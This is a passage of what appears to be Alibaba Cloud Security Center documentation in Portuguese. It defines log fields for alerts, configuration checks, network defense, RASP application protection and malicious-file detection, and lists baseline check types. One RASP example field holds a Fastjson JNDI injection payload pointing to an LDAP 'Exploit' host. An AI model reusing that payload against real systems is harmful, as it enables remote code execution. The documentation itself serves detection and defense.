hc_ubuntu16_cis_rules

type_alias_name

O alias do tipo.

Melhores práticas internacionais de segurança

type_name

O tipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes.

cis

uuid

O UUID do servidor onde o item de risco foi detectado.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de alerta de segurança

Campo

Descrição

Exemplo

data_source

A fonte de dados. Valores: aegis_suspicious_event (Anomalia de Host); aegis_suspicious_file_v2 (Webshell); aegis_login_log (Logon Anômalo); honeypot (Evento de Alerta de Honeypot em Nuvem); object_scan (Anomalia de Detecção de Arquivo); security_event (Anomalia do Security Center); sas_ak_leak (Evento de Vazamento de AK).

aegis_login_log

detail

Um objeto estruturado (json) fornecendo contexto detalhado do alerta. Os campos variam conforme o tipo de alerta. Valores comuns para o campo alert_reason: reason1 (IP não é de um local de logon comum); reason2 (Falha na chamada de API); reason3 (IP não é de um local de logon comum e falha na chamada de API).

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...}

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

internet_ip

O endereço IP público do ativo.

39.104.XX.XX

intranet_ip

O endereço IP privado do ativo.

192.168.XX.XX

level

O nível de risco do evento de alerta. Valores: serious (Urgente); suspicious (Suspeito); remind (Lembrete).

suspicious

name

O nome do alerta.

Logon Anômalo - Logon de Conta Incomum ECS

operation

A operação. Valores: new (Novo); dealing (Processando); update (Atualizado).

new

status

O status do alerta. Valores: 1 (Não tratado, padrão para novos alertas); 2 (Ignorado, após executar a ação Ignorar); 8 (Na lista de permissões, após adicionar à lista de permissões); 16 (Processando, durante ações de encerrar processo/isolar arquivo/lista de permissões); 32 (Processado, após tratamento manual ou conclusão de ações de encerrar processo/isolar arquivo); 64 (Expirado, se nenhuma ação for tomada em 30 dias); 513 (Bloqueado automaticamente, o alerta foi bloqueado automaticamente pelo recurso de defesa precisa do Security Center e não requer tratamento manual).

1

unique_info

O identificador exclusivo do alerta.

2536dd765f804916a1fa3b9516b5****

uuid

O UUID do servidor onde o alerta foi gerado.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

suspicious_event_id

O ID do evento de alerta.

650226318

handle_time

O timestamp correspondente à operação.

1765272845

alert_first_time

O timestamp quando o alerta apareceu pela primeira vez.

1764226915

alert_last_time

O timestamp quando o alerta apareceu pela última vez.

1765273425

strict_mode

Indica se o alerta está no modo estrito. Valores: true; false.

true

user_id

O ID da conta.

13583357

CSPM - Logs de verificação de configuração de plataforma em cloud

Campo

Descrição

Exemplo

check_id

O ID do item de verificação. Você pode obter este ID chamando a operação ListCheckResult.

11

check_item_name

O nome do item de verificação.

Configuração de busca de source

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

instance_name

O nome da instância.

lsm

instance_result

O impacto do risco, como uma string json.

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]}

instance_sub_type

O subtipo da instância. Os valores dependem de instance_type: Para ECS: INSTANCE, DISK, SECURITY_GROUP. Para ACR: REPOSITORY_ENTERPRISE, REPOSITORY_PERSON. Para RAM: ALIAS, USER, POLICY, GROUP. Para WAF: DOMAIN. Para outros tipos: INSTANCE.

INSTANCE

instance_type

O tipo de instância. Valores: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address).

ECS

region_id

O ID da região onde a instância reside.

cn-hangzhou

requirement_id

O ID do requisito. Você pode obter este ID chamando a operação ListCheckStandard.

5

risk_level

O nível de risco. Valores: LOW; MEDIUM; HIGH.

MEDIUM

section_id

O ID da seção. Você pode obter este ID chamando a operação ListCheckResult.

1

standard_id

O ID do padrão. Você pode obter este ID chamando a operação ListCheckStandard.

1

status

O status do item de verificação. Valores: NOT_CHECK (Não verificado); CHECKING (Verificando); PASS (Aprovado); NOT_PASS (Reprovado); WHITELIST (Na lista de permissões).

PASS

vendor

O provedor de services em cloud. Valor fixo: ALIYUN.

ALIYUN

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de defesa de rede

Campo

Descrição

Exemplo

cmd

A linha de comando do processo atacado.

nginx: master process nginx

cur_time

O horário em que o evento de ataque ocorreu.

2023-09-14 09:21:59

decode_payload

O payload convertido de HEX para caracteres.

POST /Services/FileService/UserFiles/

dst_ip

O endereço IP do ativo atacado.

172,16.XX.XX

dst_port

A porta do ativo atacado.

80

func

O tipo de evento interceptado. Valores: payload (interceptação de payload malicioso, acionada pela detecção de dados ou comandos maliciosos); tuple (interceptação de IP malicioso, acionada pela detecção de acesso de IP malicioso).

payload

rule_type

O tipo específico de regra do evento interceptado. Valores: alinet_payload (regra de defesa de evento de payload definida pelo Security Center); alinet_tuple (regra de defesa de evento de tupla definida pelo Security Center).

alinet_payload

instance_id

O ID da instância do ativo atacado.

i-2zeg4zldn8zypsfg****

internet_ip

O endereço IP público do ativo atacado.

39.104.XX.XX

intranet_ip

O endereço IP privado do ativo atacado.

192.168.XX.XX

final_action

A ação de defesa. Valor fixo: block (Bloqueado).

block

payload

O payload no formato HEX.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

O ID do processo atacado.

7107

platform

O tipo de sistema do ativo atacado. Valores: windows; linux.

linux

proc_path

O caminho do processo atacado.

/usr/sbin/nginx

sas_group_name

O grupo de ativos do servidor no Security Center.

default

src_ip

O endereço IP de source do ataque.

106.11.XX.XX

src_port

A porta de source do ataque.

29575

uuid

O UUID do servidor.

5d83b26b-b7ca-4a0a-9267-12****

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de proteção de aplicação

Campo

Descrição

Exemplo

app_dir

O diretório onde a aplicação reside.

/usr/local/aegis/rasp/apps/1111

app_id

O ID da aplicação.

6492a391fc9b4e2aad94****

app_name

O nome da aplicação.

test

confidence_level

O nível de confiança do algoritmo de detecção. Valores: high; medium; low.

low

request_body

O corpo da solicitação.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

O comprimento do corpo da solicitação.

112

data

Os parâmetros do ponto de hook.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

Os cabeçalhos da solicitação.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...}

hostname

O nome do host ou dispositivo de rede.

testhostname

host_ip

O endereço IP privado do host.

172,16.XX.XX

is_cliped

Indica se o log foi truncado devido à ultrapassagem do limite de comprimento. Valores: true (truncado); false (não truncado).

false

jdk_version

A versão do JDK.

1.8.0_292

message

A descrição do alerta.

Serialização de classe insegura.

request_method

O método de solicitação HTTP.

Post

platform

O tipo de sistema operacional.

Linux

arch

A arquitetura do sistema operacional.

amd64

kernel_version

A versão do kernel do sistema operacional.

3.10.0-1160.59.1.el7.x86_64

param

Os parâmetros da solicitação. Formatos comuns incluem parâmetros GET e application/x-www-form-urlencoded.

{"url":["http://127.0.0.1.xip.io"]}

payload

O payload de ataque efetivo.

bash -c kill -0 -- -'31098'

payload_length

O comprimento do payload de ataque.

27

rasp_id

O ID exclusivo da sonda RASP.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

A versão da sonda RASP.

0.8.5

src_ip

O endereço IP do solicitante.

172,0.XX.XX

final_action

O resultado do tratamento do alerta. Valores: block (Bloqueado); monitor (Monitoramento).

block

rule_action

O método de tratamento de alerta especificado pela regra. Valores: block; monitor.

block

risk_level

O nível de risco. Valores: high; medium; low.

high

stacktrace

O rastreamento de pilha.

[java.io.FileInputStream.<init>(FileInputStream.java:123), ...]

time

O horário em que o alerta foi acionado.

2023-10-09 15:19:15

timestamp

O timestamp quando o alerta foi acionado, em milissegundos.

1696835955070

type

O tipo de ataque. Valores: attach (anexação maliciosa); beans (vinculação maliciosa de beans); classloader (carregamento malicioso de classe); dangerous_protocol (uso de protocolo perigoso); dns (consulta DNS maliciosa); engine (injeção de mecanismo); expression (injeção de expressão); file (leitura/escrita maliciosa de arquivo); file_delete (exclusão arbitrária de arquivo); file_list (travessia de diretório); file_read (leitura arbitrária de arquivo); file_upload (upload malicioso de arquivo); jndi (injeção JNDI); jni (injeção JNI); jstl (inclusão arbitrária de arquivo JSTL); memory_shell (injeção de webshell em memória); rce (execução remota de código); read_object (ataque de desserialização); reflect (reflexão maliciosa); sql (injeção SQL); ssrf (conexão de saída maliciosa); thread_inject (injeção de thread); xxe (ataque XXE).

rce

url

A URL da solicitação.

http://127.0.0.1:999/xxx

rasp_attack_uuid

O UUID do evento de ataque.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

O UUID do host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

O endereço IP público do host.

1,2.XX.XX

intranet_ip

O endereço IP privado do host.

172,16.XX.XX

sas_group_name

O nome do grupo de servidores do Security Center.

Group 1

instance_id

O ID da instância do host.

i-wz995eivg28f1m**

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Logs de detecção de arquivos maliciosos

Campo

Descrição

Exemplo

bucket_name

O nome do bucket OSS.

***-test

event_id

O ID do alerta.

802210

event_name

O nome do alerta.

Programa de mineração

md5

O hash MD5 do arquivo.

6bc2bc53d409b1

sha256

O hash SHA256 do arquivo.

f038f95257772981e87f85

result

O resultado da detecção. Valores: 0 (Arquivo seguro); 1 (Arquivo malicioso detectado).

0

file_path

O caminho do arquivo.

test.zip/bin_test

etag

O identificador de arquivo OSS.

6BC2B853D409B1

risk_level

O nível de risco. Valores: serious (Urgente); suspicious (Suspeito); remind (Lembrete).

remind

source

O cenário de detecção. Valores: OSS (detecção de arquivo em um bucket OSS via console do Security Center); API (detecção de arquivo malicioso via SDK Java ou Python).

OSS

parent_md5

O hash MD5 do arquivo pai ou arquivo compactado.

3d0f8045bb9

parent_sha256

O hash SHA256 do arquivo pai ou arquivo compactado.

69b643d6a3fb859fa

parent_file_path

O nome do arquivo pai ou arquivo compactado.

test.zip

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

compress_file_number

O número sequencial do subarquivo em um arquivo compactado, no formato [atual]/[total]. Por exemplo, 1/10 significa que este é o arquivo 1 de 10 no arquivo compactado.

1/10

Logs de eventos de monitoramento de arquivos críticos

Campo

Descrição

Exemplo

start_time

O horário da ocorrência mais recente do evento, em segundos.

1718678414

uuid

O UUID do cliente.

5d83b26b-ba-4a-9267-12****

file_path

O caminho do arquivo.

/etc/passwd

proc_path

O caminho do processo.

/usr/bin/bash

rule_id

O ID da regra correspondente.

123

rule_name

O nome da regra.

file_test_rule

cmdline

A linha de comando.

bash /opt/a

operation

A operação realizada no arquivo.

READ

risk_level

O nível de alerta.

2

pid

O ID do processo.

45324

proc_permission

As permissões do processo.

rwxrwxrwx

instance_id

O ID da instância.

i-wz995eivg2****

internet_ip

O endereço IP público.

192.0.2.1

intranet_ip

O endereço IP privado.

172,16.0.1

instance_name

O nome da instância.

aegis-test

platform

O tipo de sistema operacional.

Linux

Logs de detecção sem agente

Campos comuns

Campo

Descrição

Exemplo

uuid

O UUID do servidor.

ad66133a-dc82-4e5e-9659-a49e3****

instance_id

O ID da instância.

i-2zeg4zldn8zypsfg****

internet_ip

O endereço IP público do ativo.

39.104.XX.XX

intranet_ip

O endereço IP privado do ativo.

192.168.XX.XX

sas_group_name

O grupo de ativos do servidor no Security Center.

default

start_time

O timestamp de início, em segundos. Também usado para indicar o momento em que o evento ocorreu.

1719472214

Campos de risco de vulnerabilidade

Campo

Descrição

Exemplo

vul_name

O nome da vulnerabilidade.

imgsca:java:gson:AVD-2022-25647

vul_alias_name

O alias da vulnerabilidade.

Vulnerabilidade de problema de código gson (CVE-2022-25647)

vul_primary_id

O ID de chave primária da vulnerabilidade.

990174361

type

O tipo de vulnerabilidade. Valores: sys (vulnerabilidade de sistema Windows); cve (vulnerabilidade de software Linux); sca (vulnerabilidade de aplicação, tipo de análise de componente de software); emg (vulnerabilidade urgente).

sca

alert_level

O nível de risco da vulnerabilidade. Valores: asap (Alto); later (Médio); nntf (Baixo).

asap

instance_name

O nome do host.

hhht-linux-***

operation

A ação realizada na vulnerabilidade. Valores: new (Nova); update (Atualizada).

new

status

O status da vulnerabilidade. Valores: 1 (Não corrigida); 7 (Corrigida).

1

tag

A tag da vulnerabilidade. Valores: oval (vulnerabilidade de software Linux); system (vulnerabilidade de sistema Windows). Tags para outros tipos de vulnerabilidade são strings aleatórias.

oval

Campos de verificação de linha de base

Campo

Descrição

Exemplo

check_item_name

O nome do item de verificação.

Defina tempo de expiração da senha

check_item_level

O nível de risco do item de verificação. Valores: high (Alto); medium (Médio); low (Baixo).

high

check_type

O tipo do item de verificação.

Autenticação de identidade

risk_level

O nível de risco. Valores: high (Alto); medium (Médio); low (Baixo).

low

operation

A ação. Valores: new (Novo); update (Atualizado).

new

risk_name

O nome do item de risco.

Verificação de conformidade da política de senha

status

O status do item de verificação. Valores: 1 (Falhou); 3 (Aprovado).

1

sub_type_alias_name

O alias do subtipo.

Padrão Alibaba Cloud - Linha de base de segurança CentOS Linux 7/8

sub_type_name

O nome do subtipo de linha de base. Para valores válidos, consulte List of baseline types and subtypes.

hc_centos7

type_name

O nome do tipo de linha de base.

hc_best_secruity

type_alias_name

O alias do tipo.

Melhores práticas de segurança

container_id

O ID do contêiner.

b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****

container_name

O nome do contêiner.

k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

Campos de amostra maliciosa

Campo

Descrição

Exemplo

alert_level

O nível de risco. Valores: serious (Urgente); suspicious (Suspeito); remind (Lembrete).

suspicious

alert_name

O nome do alerta de amostra maliciosa.

Processo Suspeito - Baseado em ssh

operation

A ação. Valores: new (Novo); update (Atualizado).

new

status

O status de risco da amostra maliciosa. Valores: 0 (Não tratado); 3 (Na lista de permissões).

0

suspicious_event_id

O ID do evento de alerta.

909361

Campos de arquivo sensível

Campo

Descrição

Exemplo

alert_level

O nível de risco. Valores: high (Alto); medium (Médio); low (Baixo).

high

rule_name

O nome do tipo de arquivo.

Token Ionic

file_path

O caminho do arquivo sensível.

/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll

result

O resultado da verificação.

{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

Apêndice

Lista de tipos e subtipos de linha de base

Nome do tipo

Nome do subtipo

Descrição

hc_exploit

hc_exploit_redis

Exploração de ameaça de alto risco: Acesso não autorizado ao Redis

hc_exploit_activemq

Exploração de ameaça de alto risco: Acesso não autorizado ao ActiveMQ

hc_exploit_couchdb

Exploração de ameaça de alto risco: Acesso não autorizado ao CouchDB

hc_exploit_docker

Exploração de ameaça de alto risco: Acesso não autorizado ao Docker

hc_exploit_es

Exploração de ameaça de alto risco: Acesso não autorizado ao Elasticsearch

hc_exploit_hadoop

Exploração de ameaça de alto risco: Acesso não autorizado ao Hadoop

hc_exploit_jboss

Exploração de ameaça de alto risco: Acesso não autorizado ao JBoss

hc_exploit_jenkins

Exploração de ameaça de alto risco: Acesso não autorizado ao Jenkins

hc_exploit_k8s_api

Exploração de ameaça de alto risco: Acesso não autorizado ao servidor de API Kubernetes

hc_exploit_ldap

Exploração de ameaça de alto risco: Acesso não autorizado ao LDAP (Windows)

hc_exploit_ldap_linux

Exploração de ameaça de alto risco: Acesso não autorizado ao OpenLDAP (Linux)

hc_exploit_memcache

Exploração de ameaça de alto risco: Acesso não autorizado ao Memcached

hc_exploit_mongo

Exploração de ameaça de alto risco: Acesso não autorizado ao MongoDB

hc_exploit_pgsql

Exploração de ameaça de alto risco: Acesso não autorizado ao PostgreSQL

hc_exploit_rabbitmq

Exploração de ameaça de alto risco: Acesso não autorizado ao RabbitMQ

hc_exploit_rsync

Exploração de ameaça de alto risco: Acesso não autorizado ao rsync

hc_exploit_tomcat

Exploração de ameaça de alto risco: Vulnerabilidade de inclusão de arquivo AJP do Apache Tomcat

hc_exploit_zookeeper

Exploração de ameaça de alto risco: Acesso não autorizado ao ZooKeeper

hc_container

hc_docker

Padrão Alibaba Cloud: Verificação de linha de base de segurança Docker

hc_middleware_ack_master

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança do nó mestre Kubernetes (ACK)

hc_middleware_ack_node

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança do nó Kubernetes (ACK)

hc_middleware_k8s

Padrão Alibaba Cloud: Verificação de linha de base de segurança do mestre Kubernetes

hc_middleware_k8s_node

Padrão Alibaba Cloud: Verificação de linha de base de segurança do nó Kubernetes

cis

hc_suse 15_djbh

MLPS Nível 3: Verificação de linha de base de conformidade SUSE 15

hc_aliyun_linux3_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Alibaba Cloud Linux 3

hc_aliyun_linux_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Alibaba Cloud Linux/Aliyun Linux 2

hc_bind_djbh

MLPS Nível 3: Verificação de linha de base de conformidade Bind

hc_centos 6_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 6

hc_centos 7_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 7

hc_centos 8_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade CentOS Linux 8

hc_debian_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Debian Linux 8/9/10

hc_iis_djbh

MLPS Nível 3: Verificação de linha de base de conformidade IIS

hc_informix_djbh

MLPS Nível 3: Verificação de linha de base de conformidade Informix

hc_jboss_djbh

MLPS Nível 3: Verificação de linha de base de conformidade JBoss

hc_mongo_djbh

MLPS Nível 3: Verificação de linha de base de conformidade MongoDB

hc_mssql_djbh

MLPS Nível 3: Verificação de linha de base de conformidade SQL Server

hc_mysql_djbh

MLPS Nível 3: Verificação de linha de base de conformidade MySQL

hc_nginx_djbh

MLPS Nível 3: Verificação de linha de base de conformidade Nginx

hc_oracle_djbh

MLPS Nível 3: Verificação de linha de base de conformidade Oracle

hc_pgsql_djbh

MLPS Nível 3: Verificação de linha de base de conformidade PostgreSQL

hc_redhat 6_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Red Hat Linux 6

hc_redhat_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Red Hat Linux 7

hc_redis_djbh

MLPS Nível 3: Verificação de linha de base de conformidade Redis

hc_suse 10_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade SUSE 10

hc_suse 12_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade SUSE 12

hc_suse_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade SUSE 11

hc_ubuntu 14_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Ubuntu 14

hc_ubuntu_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Ubuntu 16/18/20

hc_was_djbh

MLPS Nível 3: Verificação de linha de base de conformidade WebSphere Application Server

hc_weblogic_djbh

MLPS Nível 3: Verificação de linha de base de conformidade WebLogic

hc_win 2008_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Windows 2008 R2

hc_win 2012_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Windows 2012 R2

hc_win 2016_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Windows 2016/2019

hc_aliyun_linux_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Alibaba Cloud Linux/Aliyun Linux 2

hc_centos 6_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade CentOS Linux 6

hc_centos 7_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade CentOS Linux 7

hc_debian_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Debian Linux 8

hc_redhat 7_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Red Hat Linux 7

hc_ubuntu_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Ubuntu 16/18

hc_win 2008_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Windows 2008 R2

hc_win 2012_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Windows 2012 R2

hc_win 2016_djbh_l2

MLPS Nível 2: Verificação de linha de base de conformidade Windows 2016/2019

hc_aliyun_linux_cis

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Alibaba Cloud Linux/Aliyun Linux 2

hc_centos 6_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 6

hc_centos 7_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 7

hc_centos 8_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança CentOS Linux 8

hc_debian 8_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Debian Linux 8

hc_ubuntu 14_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Ubuntu 14

hc_ubuntu 16_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Ubuntu 16/18/20

hc_win 2008_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2008 R2

hc_win 2012_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2012 R2

hc_win 2016_cis_rules

Melhores práticas internacionais de segurança: Verificação de linha de base de segurança Windows Server 2016/2019

hc_kylin_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade Kylin

hc_uos_djbh_l3

MLPS Nível 3: Verificação de linha de base de conformidade UOS

hc_best_security

hc_aliyun_linux

Padrão Alibaba Cloud: Verificação de linha de base de segurança Alibaba Cloud Linux/Aliyun Linux 2

hc_centos 6

Padrão Alibaba Cloud: Verificação de linha de base de segurança CentOS Linux 6

hc_centos 7

Padrão Alibaba Cloud: Verificação de linha de base de segurança CentOS Linux 7/8

hc_debian

Padrão Alibaba Cloud: Verificação de linha de base de segurança Debian Linux 8/9/10

hc_redhat 6

Padrão Alibaba Cloud: Verificação de linha de base de segurança Red Hat Linux 6

hc_redhat 7

Padrão Alibaba Cloud: Verificação de linha de base de segurança Red Hat Linux 7/8

hc_ubuntu

Padrão Alibaba Cloud: Verificação de linha de base de segurança Ubuntu

hc_windows_2008

Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2008 R2

hc_windows_2012

Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2012 R2

hc_windows_2016

Padrão Alibaba Cloud: Verificação de linha de base de segurança Windows 2016/2019

hc_db_mssql

Padrão Alibaba Cloud: Verificação de linha de base de segurança SQL Server

hc_memcached_ali

Padrão Alibaba Cloud: Verificação de linha de base de segurança Memcached

hc_mongodb

Padrão Alibaba Cloud: Verificação de linha de base de segurança MongoDB 3.x

hc_mysql_ali

Padrão Alibaba Cloud: Verificação de linha de base de segurança MySQL

hc_oracle

Padrão Alibaba Cloud: Verificação de linha de base de segurança Oracle 11g

hc_pgsql_ali

Padrão Alibaba Cloud: Verificação de linha de base de segurança PostgreSQL

hc_redis_ali

Padrão Alibaba Cloud: Verificação de linha de base de segurança Redis

hc_apache

Padrão Alibaba Cloud: Verificação de linha de base de segurança Apache

hc_iis_8

Padrão Alibaba Cloud: Verificação de linha de base de segurança IIS 8

hc_nginx_linux

Padrão Alibaba Cloud: Verificação de linha de base de segurança Nginx

hc_suse 15

Padrão Alibaba Cloud: Verificação de linha de base de segurança SUSE Linux 15

tomcat 7

Padrão Alibaba Cloud: Verificação de linha de base de segurança Apache Tomcat

weak_password

hc_mongodb_pwd

Senha fraca: Detecção de senha fraca de logon MongoDB (versão 2.x)

hc_weakpwd_ftp_linux

Senha fraca: Verifique senha fraca de logon FTP

hc_weakpwd_linux_sys

Senha fraca: Verifique senha fraca de logon do sistema Linux

hc_weakpwd_mongodb 3

Senha fraca: Detecção de senha fraca de logon MongoDB

hc_weakpwd_mssql

Senha fraca: Verifique senha fraca de logon do banco de dados SQL Server

hc_weakpwd_mysql_linux

Senha fraca: Verifique senha fraca de logon do banco de dados MySQL

hc_weakpwd_mysql_win

Senha fraca: Verifique senha fraca de logon do banco de dados MySQL (Windows)

hc_weakpwd_openldap

Senha fraca: Verifique senha fraca de logon OpenLDAP

hc_weakpwd_oracle

Senha fraca: Detecção de senha fraca de logon Oracle

hc_weakpwd_pgsql

Senha fraca: Verifique senha fraca de logon do banco de dados PostgreSQL

hc_weakpwd_pptp

Senha fraca: Verifique senha fraca de logon do service pptpd

hc_weakpwd_redis_linux

Senha fraca: Verifique senha fraca de logon do banco de dados Redis

hc_weakpwd_rsync

Senha fraca: Verifique senha fraca de logon do service rsync

hc_weakpwd_svn

Senha fraca: Verifique senha fraca de logon do service SVN

hc_weakpwd_tomcat_linux

Senha fraca: Verifique senha fraca do console Apache Tomcat

hc_weakpwd_vnc

Senha fraca: Verifique senha fraca do VNC Server

hc_weakpwd_weblogic

Senha fraca: Detecção de senha fraca de logon WebLogic 12c

hc_weakpwd_win_sys

Senha fraca: Verifique senha fraca de logon do sistema Windows